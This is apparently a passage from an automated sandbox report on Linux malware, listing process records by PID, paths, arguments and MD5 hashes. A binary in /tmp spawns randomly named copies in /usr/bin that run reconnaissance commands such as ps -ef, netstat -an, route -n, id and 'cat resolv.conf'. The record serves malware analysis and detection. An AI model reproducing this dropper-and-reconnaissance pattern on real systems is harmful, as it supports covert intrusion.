MD5 hash:	75e59fa1a4720187f898957348fda126

Chronological Activities

Analysis Process: txflbjqefg PID: 9900, Parent PID: 9899

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/usr/bin/txflbjqefg
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	75e59fa1a4720187f898957348fda126

Chronological Activities

Analysis Process: dkuidbsedp PID: 9909, Parent PID: 9446

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9910, Parent PID: 9909

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: txflbjqefg PID: 9910, Parent PID: 9909

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/usr/bin/txflbjqefg
Arguments:	/usr/bin/txflbjqefg "ls -la" 9446
File size:	625889 bytes
MD5 hash:	75e59fa1a4720187f898957348fda126

Chronological Activities

Analysis Process: txflbjqefg PID: 9911, Parent PID: 9910

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/usr/bin/txflbjqefg
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	75e59fa1a4720187f898957348fda126

Chronological Activities

Analysis Process: dkuidbsedp PID: 9920, Parent PID: 9446

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9921, Parent PID: 9920

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: txflbjqefg PID: 9921, Parent PID: 9920

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/usr/bin/txflbjqefg
Arguments:	/usr/bin/txflbjqefg "ps -ef" 9446
File size:	625889 bytes
MD5 hash:	75e59fa1a4720187f898957348fda126

Chronological Activities

Analysis Process: txflbjqefg PID: 9922, Parent PID: 9921

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/usr/bin/txflbjqefg
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	75e59fa1a4720187f898957348fda126

Chronological Activities

Analysis Process: dkuidbsedp PID: 9931, Parent PID: 9446

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9932, Parent PID: 9931

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qjfxtxsijs PID: 9932, Parent PID: 9931

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/usr/bin/qjfxtxsijs
Arguments:	/usr/bin/qjfxtxsijs ifconfig 9446
File size:	625889 bytes
MD5 hash:	446f97ee9842b394ed1a50fe59b5c7d8

Chronological Activities

Analysis Process: qjfxtxsijs PID: 9933, Parent PID: 9932

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/usr/bin/qjfxtxsijs
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	446f97ee9842b394ed1a50fe59b5c7d8

Chronological Activities

Analysis Process: dkuidbsedp PID: 9942, Parent PID: 9446

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9943, Parent PID: 9942

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qjfxtxsijs PID: 9943, Parent PID: 9942

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/usr/bin/qjfxtxsijs
Arguments:	/usr/bin/qjfxtxsijs "route -n" 9446
File size:	625889 bytes
MD5 hash:	446f97ee9842b394ed1a50fe59b5c7d8

Chronological Activities

Analysis Process: qjfxtxsijs PID: 9944, Parent PID: 9943

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/usr/bin/qjfxtxsijs
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	446f97ee9842b394ed1a50fe59b5c7d8

Chronological Activities

Analysis Process: dkuidbsedp PID: 9953, Parent PID: 9446

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9954, Parent PID: 9953

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qjfxtxsijs PID: 9954, Parent PID: 9953

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/usr/bin/qjfxtxsijs
Arguments:	/usr/bin/qjfxtxsijs pwd 9446
File size:	625889 bytes
MD5 hash:	446f97ee9842b394ed1a50fe59b5c7d8

Chronological Activities

Analysis Process: qjfxtxsijs PID: 9955, Parent PID: 9954

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/usr/bin/qjfxtxsijs
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	446f97ee9842b394ed1a50fe59b5c7d8

Chronological Activities

Analysis Process: dkuidbsedp PID: 9964, Parent PID: 9446

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9965, Parent PID: 9964

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qjfxtxsijs PID: 9965, Parent PID: 9964

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/usr/bin/qjfxtxsijs
Arguments:	/usr/bin/qjfxtxsijs id 9446
File size:	625889 bytes
MD5 hash:	446f97ee9842b394ed1a50fe59b5c7d8

Chronological Activities

Analysis Process: qjfxtxsijs PID: 9966, Parent PID: 9965

General

Start time:	09:48:59
Start date:	27/07/2022
Path:	/usr/bin/qjfxtxsijs
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	446f97ee9842b394ed1a50fe59b5c7d8

Chronological Activities

Analysis Process: dkuidbsedp PID: 9975, Parent PID: 9446

General

Start time:	09:49:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9976, Parent PID: 9975

General

Start time:	09:49:00
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: qjfxtxsijs PID: 9976, Parent PID: 9975

General

Start time:	09:49:00
Start date:	27/07/2022
Path:	/usr/bin/qjfxtxsijs
Arguments:	/usr/bin/qjfxtxsijs "cat resolv.conf" 9446
File size:	625889 bytes
MD5 hash:	446f97ee9842b394ed1a50fe59b5c7d8

Chronological Activities

Analysis Process: qjfxtxsijs PID: 9977, Parent PID: 9976

General

Start time:	09:49:00
Start date:	27/07/2022
Path:	/usr/bin/qjfxtxsijs
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	446f97ee9842b394ed1a50fe59b5c7d8

Chronological Activities

Analysis Process: dkuidbsedp PID: 9988, Parent PID: 9446

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9989, Parent PID: 9988

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tudlcvpgbc PID: 9989, Parent PID: 9988

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/usr/bin/tudlcvpgbc
Arguments:	/usr/bin/tudlcvpgbc "netstat -an" 9446
File size:	625889 bytes
MD5 hash:	e9f6680f4483fb8bc5fb7e9e55222bd7

Chronological Activities

Analysis Process: tudlcvpgbc PID: 9990, Parent PID: 9989

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/usr/bin/tudlcvpgbc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	e9f6680f4483fb8bc5fb7e9e55222bd7

Chronological Activities

Analysis Process: dkuidbsedp PID: 9999, Parent PID: 9446

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10000, Parent PID: 9999

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tudlcvpgbc PID: 10000, Parent PID: 9999

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/usr/bin/tudlcvpgbc
Arguments:	/usr/bin/tudlcvpgbc id 9446
File size:	625889 bytes
MD5 hash:	e9f6680f4483fb8bc5fb7e9e55222bd7

Chronological Activities

Analysis Process: tudlcvpgbc PID: 10001, Parent PID: 10000

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/usr/bin/tudlcvpgbc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	e9f6680f4483fb8bc5fb7e9e55222bd7

Chronological Activities

Analysis Process: dkuidbsedp PID: 10010, Parent PID: 9446

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10011, Parent PID: 10010

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tudlcvpgbc PID: 10011, Parent PID: 10010

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/usr/bin/tudlcvpgbc
Arguments:	/usr/bin/tudlcvpgbc "sleep 1" 9446
File size:	625889 bytes
MD5 hash:	e9f6680f4483fb8bc5fb7e9e55222bd7

Chronological Activities

Analysis Process: tudlcvpgbc PID: 10012, Parent PID: 10011

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/usr/bin/tudlcvpgbc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	e9f6680f4483fb8bc5fb7e9e55222bd7

Chronological Activities

Analysis Process: dkuidbsedp PID: 10021, Parent PID: 9446

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10022, Parent PID: 10021

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tudlcvpgbc PID: 10022, Parent PID: 10021

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/usr/bin/tudlcvpgbc
Arguments:	/usr/bin/tudlcvpgbc "route -n" 9446
File size:	625889 bytes
MD5 hash:	e9f6680f4483fb8bc5fb7e9e55222bd7

Chronological Activities

Analysis Process: tudlcvpgbc PID: 10023, Parent PID: 10022

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/usr/bin/tudlcvpgbc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	e9f6680f4483fb8bc5fb7e9e55222bd7

Chronological Activities

Analysis Process: dkuidbsedp PID: 10032, Parent PID: 9446

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10033, Parent PID: 10032

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: tudlcvpgbc PID: 10033, Parent PID: 10032

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/usr/bin/tudlcvpgbc
Arguments:	/usr/bin/tudlcvpgbc "ls -la" 9446
File size:	625889 bytes
MD5 hash:	e9f6680f4483fb8bc5fb7e9e55222bd7

Chronological Activities

Analysis Process: tudlcvpgbc PID: 10034, Parent PID: 10033

General

Start time:	09:49:05
Start date:	27/07/2022
Path:	/usr/bin/tudlcvpgbc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	e9f6680f4483fb8bc5fb7e9e55222bd7

Chronological Activities

Analysis Process: dkuidbsedp PID: 10043, Parent PID: 9446

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10044, Parent PID: 10043

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: whtzopaggc PID: 10044, Parent PID: 10043

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/usr/bin/whtzopaggc
Arguments:	/usr/bin/whtzopaggc "echo \"find\"" 9446
File size:	625889 bytes
MD5 hash:	3fa295ff1f014fb5dd96c4434909ec39

Chronological Activities

Analysis Process: whtzopaggc PID: 10045, Parent PID: 10044

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/usr/bin/whtzopaggc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	3fa295ff1f014fb5dd96c4434909ec39

Chronological Activities

Analysis Process: dkuidbsedp PID: 10054, Parent PID: 9446

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10055, Parent PID: 10054

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: whtzopaggc PID: 10055, Parent PID: 10054

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/usr/bin/whtzopaggc
Arguments:	/usr/bin/whtzopaggc "grep \"A\"" 9446
File size:	625889 bytes
MD5 hash:	3fa295ff1f014fb5dd96c4434909ec39

Chronological Activities

Analysis Process: whtzopaggc PID: 10056, Parent PID: 10055

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/usr/bin/whtzopaggc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	3fa295ff1f014fb5dd96c4434909ec39

Chronological Activities

Analysis Process: dkuidbsedp PID: 10065, Parent PID: 9446

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10066, Parent PID: 10065

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: whtzopaggc PID: 10066, Parent PID: 10065

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/usr/bin/whtzopaggc
Arguments:	/usr/bin/whtzopaggc bash 9446
File size:	625889 bytes
MD5 hash:	3fa295ff1f014fb5dd96c4434909ec39

Chronological Activities

Analysis Process: whtzopaggc PID: 10068, Parent PID: 10066

General

Start time:	09:49:10
Start date:	27/07/2022
Path:	/usr/bin/whtzopaggc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	3fa295ff1f014fb5dd96c4434909ec39

Chronological Activities

Analysis Process: dkuidbsedp PID: 10076, Parent PID: 9446

General

Start time:	09:49:11
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10077, Parent PID: 10076

General

Start time:	09:49:11
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: whtzopaggc PID: 10077, Parent PID: 10076

General

Start time:	09:49:11
Start date:	27/07/2022
Path:	/usr/bin/whtzopaggc
Arguments:	/usr/bin/whtzopaggc gnome-terminal 9446
File size:	625889 bytes
MD5 hash:	3fa295ff1f014fb5dd96c4434909ec39

Chronological Activities

Analysis Process: whtzopaggc PID: 10078, Parent PID: 10077

General

Start time:	09:49:11
Start date:	27/07/2022
Path:	/usr/bin/whtzopaggc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	3fa295ff1f014fb5dd96c4434909ec39

Chronological Activities

Analysis Process: dkuidbsedp PID: 10087, Parent PID: 9446

General

Start time:	09:49:11
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10088, Parent PID: 10087

General

Start time:	09:49:11
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: whtzopaggc PID: 10088, Parent PID: 10087

General

Start time:	09:49:11
Start date:	27/07/2022
Path:	/usr/bin/whtzopaggc
Arguments:	/usr/bin/whtzopaggc "netstat -an" 9446
File size:	625889 bytes
MD5 hash:	3fa295ff1f014fb5dd96c4434909ec39

Chronological Activities

Analysis Process: whtzopaggc PID: 10089, Parent PID: 10088

General

Start time:	09:49:11
Start date:	27/07/2022
Path:	/usr/bin/whtzopaggc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	3fa295ff1f014fb5dd96c4434909ec39

Chronological Activities

Analysis Process: dkuidbsedp PID: 10098, Parent PID: 9446

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10099, Parent PID: 10098

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: kmavqzvhro PID: 10099, Parent PID: 10098

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/usr/bin/kmavqzvhro
Arguments:	/usr/bin/kmavqzvhro bash 9446
File size:	625889 bytes
MD5 hash:	a39f4dbba50225792bc678e0ae044ef5

Chronological Activities

Analysis Process: kmavqzvhro PID: 10100, Parent PID: 10099

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/usr/bin/kmavqzvhro
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	a39f4dbba50225792bc678e0ae044ef5

Chronological Activities

Analysis Process: dkuidbsedp PID: 10109, Parent PID: 9446

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10110, Parent PID: 10109

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: kmavqzvhro PID: 10110, Parent PID: 10109

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/usr/bin/kmavqzvhro
Arguments:	/usr/bin/kmavqzvhro ifconfig 9446
File size:	625889 bytes
MD5 hash:	a39f4dbba50225792bc678e0ae044ef5

Chronological Activities

Analysis Process: kmavqzvhro PID: 10111, Parent PID: 10110

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/usr/bin/kmavqzvhro
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	a39f4dbba50225792bc678e0ae044ef5

Chronological Activities

Analysis Process: dkuidbsedp PID: 10120, Parent PID: 9446

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10121, Parent PID: 10120

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: kmavqzvhro PID: 10121, Parent PID: 10120

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/usr/bin/kmavqzvhro
Arguments:	/usr/bin/kmavqzvhro "ps -ef" 9446
File size:	625889 bytes
MD5 hash:	a39f4dbba50225792bc678e0ae044ef5

Chronological Activities

Analysis Process: kmavqzvhro PID: 10122, Parent PID: 10121

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/usr/bin/kmavqzvhro
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	a39f4dbba50225792bc678e0ae044ef5

Chronological Activities

Analysis Process: dkuidbsedp PID: 10131, Parent PID: 9446

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10132, Parent PID: 10131

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: kmavqzvhro PID: 10132, Parent PID: 10131

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/usr/bin/kmavqzvhro
Arguments:	/usr/bin/kmavqzvhro "route -n" 9446
File size:	625889 bytes
MD5 hash:	a39f4dbba50225792bc678e0ae044ef5

Chronological Activities

Analysis Process: kmavqzvhro PID: 10133, Parent PID: 10132

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/usr/bin/kmavqzvhro
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	a39f4dbba50225792bc678e0ae044ef5

Chronological Activities

Analysis Process: dkuidbsedp PID: 10142, Parent PID: 9446

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10143, Parent PID: 10142

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: kmavqzvhro PID: 10143, Parent PID: 10142

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/usr/bin/kmavqzvhro
Arguments:	/usr/bin/kmavqzvhro whoami 9446
File size:	625889 bytes
MD5 hash:	a39f4dbba50225792bc678e0ae044ef5

Chronological Activities

Analysis Process: kmavqzvhro PID: 10144, Parent PID: 10143

General

Start time:	09:49:16
Start date:	27/07/2022
Path:	/usr/bin/kmavqzvhro
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	a39f4dbba50225792bc678e0ae044ef5

Chronological Activities

Analysis Process: dkuidbsedp PID: 10153, Parent PID: 9446

General

Start time:	09:49:21
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10154, Parent PID: 10153

General

Start time:	09:49:21
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: zetazkptwu PID: 10154, Parent PID: 10153

General

Start time:	09:49:21
Start date:	27/07/2022
Path:	/usr/bin/zetazkptwu
Arguments:	/usr/bin/zetazkptwu "ps -ef" 9446
File size:	625889 bytes
MD5 hash:	293bbabe5dde95c14afaf88a1fbbcb66

Chronological Activities

Analysis Process: zetazkptwu PID: 10155, Parent PID: 10154

General

Start time:	09:49:21
Start date:	27/07/2022
Path:	/usr/bin/zetazkptwu
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	293bbabe5dde95c14afaf88a1fbbcb66

Chronological Activities

Analysis Process: dkuidbsedp PID: 10164, Parent PID: 9446

General

Start time:	09:49:21
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10165, Parent PID: 10164

General

Start time:	09:49:21
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: zetazkptwu PID: 10165, Parent PID: 10164

General

Start time:	09:49:21
Start date:	27/07/2022
Path:	/usr/bin/zetazkptwu
Arguments:	/usr/bin/zetazkptwu gnome-terminal 9446
File size:	625889 bytes
MD5 hash:	293bbabe5dde95c14afaf88a1fbbcb66

Chronological Activities

Analysis Process: zetazkptwu PID: 10166, Parent PID: 10165

General

Start time:	09:49:21
Start date:	27/07/2022
Path:	/usr/bin/zetazkptwu
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	293bbabe5dde95c14afaf88a1fbbcb66

Chronological Activities

Analysis Process: dkuidbsedp PID: 10175, Parent PID: 9446

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10176, Parent PID: 10175

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: zetazkptwu PID: 10176, Parent PID: 10175

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/usr/bin/zetazkptwu
Arguments:	/usr/bin/zetazkptwu "ifconfig eth0" 9446
File size:	625889 bytes
MD5 hash:	293bbabe5dde95c14afaf88a1fbbcb66

Chronological Activities

Analysis Process: zetazkptwu PID: 10177, Parent PID: 10176

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/usr/bin/zetazkptwu
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	293bbabe5dde95c14afaf88a1fbbcb66

Chronological Activities

Analysis Process: dkuidbsedp PID: 10186, Parent PID: 9446

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10187, Parent PID: 10186

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: zetazkptwu PID: 10187, Parent PID: 10186

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/usr/bin/zetazkptwu
Arguments:	/usr/bin/zetazkptwu who 9446
File size:	625889 bytes
MD5 hash:	293bbabe5dde95c14afaf88a1fbbcb66

Chronological Activities

Analysis Process: zetazkptwu PID: 10188, Parent PID: 10187

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/usr/bin/zetazkptwu
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	293bbabe5dde95c14afaf88a1fbbcb66

Chronological Activities

Analysis Process: dkuidbsedp PID: 10197, Parent PID: 9446

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10198, Parent PID: 10197

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: zetazkptwu PID: 10198, Parent PID: 10197

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/usr/bin/zetazkptwu
Arguments:	/usr/bin/zetazkptwu "ls -la" 9446
File size:	625889 bytes
